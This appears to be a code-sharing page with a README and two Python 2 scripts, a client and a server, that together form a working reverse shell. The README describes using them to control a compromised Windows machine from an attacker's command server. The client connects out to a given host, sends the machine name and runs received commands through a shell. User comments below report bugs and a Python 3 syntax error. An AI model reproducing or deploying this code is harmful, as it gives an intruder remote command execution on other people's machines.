Reverse Shell Using Python

README.md

Reverse Shell Using Python

Via http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/ with some style changes (to use classes instead of globals).

Requirements:

• a client: a Windows machine with Python installed (tested on Server 2012; probably works on 7 and 8 too)
• a server: a Linux machine (might work elsewhere)

An attacker would use a pair of scripts like this to control a compromised Windows box from her command server. The idea is that you run revshell_server.py on the server in a terminal window (and just hang out as it listens for a connection). When the client executes revshell_client.py, a prompt will appear in the server console, awaiting commands.

Suppose your server IP address is 1.2.3.4

Execute on server:

$ python revshell_server.py

Execute on client:

C:\> python revshell_client.py 1.2.3.4

revshell_client.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# revshell_client.py
# http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/

import socket, os, subprocess, sys, re

class ReverseShellClient:

    s = None

    def connect(self, host, port):
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        port = int(port)
        try:
            print '[!] trying to connect to %s:%s' % (host, port)
            self.s.connect((host, port))
            print '[*] connection established'
            self.s.send(os.environ['COMPUTERNAME'])
        except:
            print >> sys.stderr, 'could not connect'

    def receive(self):
        received = self.s.recv(1024)
        tokens = re.split('\s+', received, 1)
        command = tokens[0]
        if command == 'quit':
            self.s.close()
        elif command == 'shell':
            if len(tokens) > 1:
                proc2 = subprocess.Popen(tokens[1], shell=True,
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE,
                    stdin=subprocess.PIPE)
                output = proc2.stdout.read() + proc2.stderr.read()
            else:
                output = 'args must follow "shell"'
        else:
            output = 'valid input is "quit" or "shell <cmd>" (e.g. "shell dir")'
        self.send(output)

    def send(self, output):
        self.s.send(output)
        self.receive()

    def stop():
        self.s.close()

if __name__ == '__main__':
    from argparse import ArgumentParser
    p = ArgumentParser()
    p.add_argument('host')
    p.add_argument('--port', '-p', type=int, default=58777)
    args = p.parse_args()
    client = ReverseShellClient()
    client.connect(args.host, args.port)
    client.receive()
    client.stop()

revshell_server.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# revshell_server.py
# http://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/

import sys, os, os.path
import socket 

class ReverseShellServer:
    
    host = ''
    port = None
    s = None
    max_bind_retries = 10
    conn = None
    addr = None
    hostname = None
    
    def create(self, port):
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.port = port

    def bind(self, current_try=0):
        try:
            print "listening on port %s (attempt %d)" % (self.port, current_try)
            self.s.bind((self.host, self.port))
            self.s.listen(1)
        except socket.error as msg:
            print >> sys.stderr, 'socket binding error:', msg[0]
            if current_try < self.max_bind_retries: 
                print >> sys.stderr, 'retrying...'
                self.bind(current_try + 1)

    def accept(self):
        try:
            self.conn, self.addr = self.s.accept()
            print '[!] session opened at %s:%s' % (self.addr[0], self.addr[1])
            self.hostname = self.conn.recv(1024)
            self.menu()
        except socket.error as msg:
            print >> sys.stderr, 'socket accepting error:', msg[0]

    def menu(self):
        while True:
            cmd = raw_input(str(self.addr[0]) + '@' + str(self.hostname) + '> ')
            if cmd == 'quit':
                self.conn.close()
                self.s.close()
                return
            command = self.conn.send(cmd)
            result = self.conn.recv(16834)
            if result <> self.hostname:
                print result

def main(args):
    server = ReverseShellServer()
    server.create(args.port)
    server.bind()
    server.accept()
    print '[*] returned from socketAccept'
    return 0

if __name__ == '__main__':
    from argparse import ArgumentParser
    p = ArgumentParser()
    p.add_argument('--port', '-p', type=int, default=58777)
    args = p.parse_args()
    code = main(args)
    exit(code)

setup: windows (client) to linux (server)
running shell cd .. (on the server) seems to put the connection in an unstable state. By which I mean specifically from that point forward I cannot do anything but close out both connections... No errors given. Just an unresponsive server and client.

for the 's' in Client what do you do??

this is what it has:

s = None

max_bind_retries = 10

conn = NONE

addr = None

hostname = None

File "revshell_server.py", line 25
print "listening on port %s (attempt %d)" % (self.port, current_try)
^
SyntaxError: invalid syntax